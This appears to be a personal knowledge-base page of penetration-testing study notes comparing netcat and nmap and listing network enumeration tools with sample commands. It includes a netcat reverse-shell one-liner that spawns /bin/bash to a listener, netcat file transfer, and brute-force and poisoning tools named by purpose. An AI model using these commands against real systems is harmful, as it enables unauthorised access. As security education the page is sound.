Adrian's KB

Network Reconnaissance

3 min read

Network Reconnaissance

🔍 nc Netcat vs Nmap

Manual Banner Grabbing / Custom Payloads nc allows you to manually connect to a port and send custom input to see how the service responds. Example:

echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc target.com 80

This is useful for interacting with obscure or custom services where nmap’s scripts might not work.

Reverse Shells and Bind Shells

nc can be used to set up reverse or bind shells, which is useful in post-exploitation or red teaming.

Example:

nc -lvnp 4444  # Listener
nc target.com 4444 -e /bin/bash  # Reverse shell

nmap is not designed for this kind of interaction.

Simple TCP/UDP Client

nc can act as a lightweight TCP or UDP client, useful for testing connectivity or service behavior.

Example:

nc -u target.com 53  # UDP DNS port

Port Knocking You can use nc to simulate port knocking sequences manually, which nmap doesn’t support natively.

File Transfers nc can be used to transfer files between systems over a raw TCP connection. Example:

# Sender 
nc -l -p 1234 < file.txt 
 
# Receiver 
nc target.com 1234 > file.txt`

🛠️ What nmap Does Better

  • Automated scanning and service detection
  • OS fingerprinting
  • Scriptable interactions via NSE (Nmap Scripting Engine)
  • Network topology mapping
  • **Vulnerability detection
  • **

🧰 Other Essential Network Enumeration Tools

1. Masscan
  • Purpose: Extremely fast port scanner (like nmap but faster).
  • Use Case: Scanning large IP ranges quickly.
  • Note: Doesn’t do service detection like nmap.
masscan -p1-65535 192.168.1.0/24 --rate=10000
2. Netdiscover
  • Purpose: ARP-based network discovery tool.
  • Use Case: Identifying live hosts on a local subnet (great for internal networks).
netdiscover -r 192.168.1.0/24
3. Fping
  • Purpose: Fast ICMP ping sweeper.
  • Use Case: Quickly identify live hosts.
fping -a -g 192.168.1.0/24
4. Hping3
  • Purpose: Packet crafting tool.
  • Use Case: Advanced scanning, firewall testing, and TCP/IP stack auditing.
hping3 -S -p 80 -c 1 target.com
5. ZMap
  • Purpose: Internet-wide network scanner.
  • Use Case: High-speed scanning of large address spaces (used in research).
6. Amass
  • Purpose: DNS enumeration and attack surface mapping.
  • Use Case: Subdomain discovery and external asset mapping.
amass enum -d example.com
7. Nessus / OpenVAS
  • Purpose: Vulnerability scanners.
  • Use Case: Deep enumeration of services and known vulnerabilities.
8. Recon-ng
  • Purpose: Web-based reconnaissance framework.
  • Use Case: OSINT and passive network enumeration.

🧠 Summary

ToolPrimary UseStrengths
nmapPort/service/OS detectionVersatile, scriptable
ncManual interaction, shell accessLightweight, flexible
masscanFast port scanningSpeed
netdiscoverLocal network discoveryARP-based, simple
fpingICMP sweepFast, efficient
hping3Packet craftingCustom scans, firewall testing
zmapInternet-wide scanningResearch-grade speed
amassDNS and subdomain enumerationExternal recon
Nessus/OpenVASVulnerability scanningDeep service analysis
Featurenc (Netcat) ✅nmap
Manual banner grabbing⚠️ (limited via NSE)
Reverse/bind shell
File transfer
Port scanning⚠️ (basic)
OS/service detection
Scriptable enumeration✅ (NSE)

 Additional Techniques (Work In Progress)

1. SMB/NetBIOS Enumeration
  • Useful in internal networks for discovering shares, users, and machines.
  • Tools:
    • enum4linux
    • smbclient
    • smbmap
    • nmap NSE scripts (smb-enum-sharessmb-enum-users)
2. SNMP Enumeration
  • If SNMP is open (UDP 161), it can leak system info, routing tables, etc.
  • Tools:
    • snmpwalk
    • onesixtyone
    • nmap NSE (snmp-infosnmp-interfaces)
3. LDAP Enumeration
  • Common in Active Directory environments.
  • Tools:
    • ldapsearch
    • nmap NSE (ldap-searchldap-rootdse)
4. RPC Enumeration
  • Useful for enumerating users and groups on Windows systems.
  • Tools:
    • rpcclient
    • nmap NSE (rpcinfomsrpc-enum)
5. VoIP Enumeration (SIP)
  • If SIP (port 5060) is open, you can enumerate extensions.
  • Tools:
    • svmapsvwarsipvicious
6. NFS Enumeration
  • If NFS is exposed, you can list and mount shares.
  • Tools:
    • showmount
    • mount
    • nmap NSE (nfs-showmountnfs-ls)
7. RDP/SSH/VNC Banner Grabbing
  • Use nmaphydra, or rdpscan to identify versions and test brute-force.
8. Nmap NSE Scripting (Deep Dive)
  • You mention NSE, but it’s worth emphasizing:
    • Vulnerability detection (http-vuln-*smb-vuln-*)
    • Auth bypass (http-auth-finder)
    • Brute-force (ftp-brutessh-brute, etc.)
    • Malware detection (http-malware-host)
🧰 Optional Tools to Mention
ToolPurpose
ResponderLLMNR/NBT-NS poisoning (internal)
CrackMapExecPost-recon enumeration & exploitation
MetasploitAuxiliary scanners and exploits
NcrackNetwork authentication brute-forcer

Graph View

Backlinks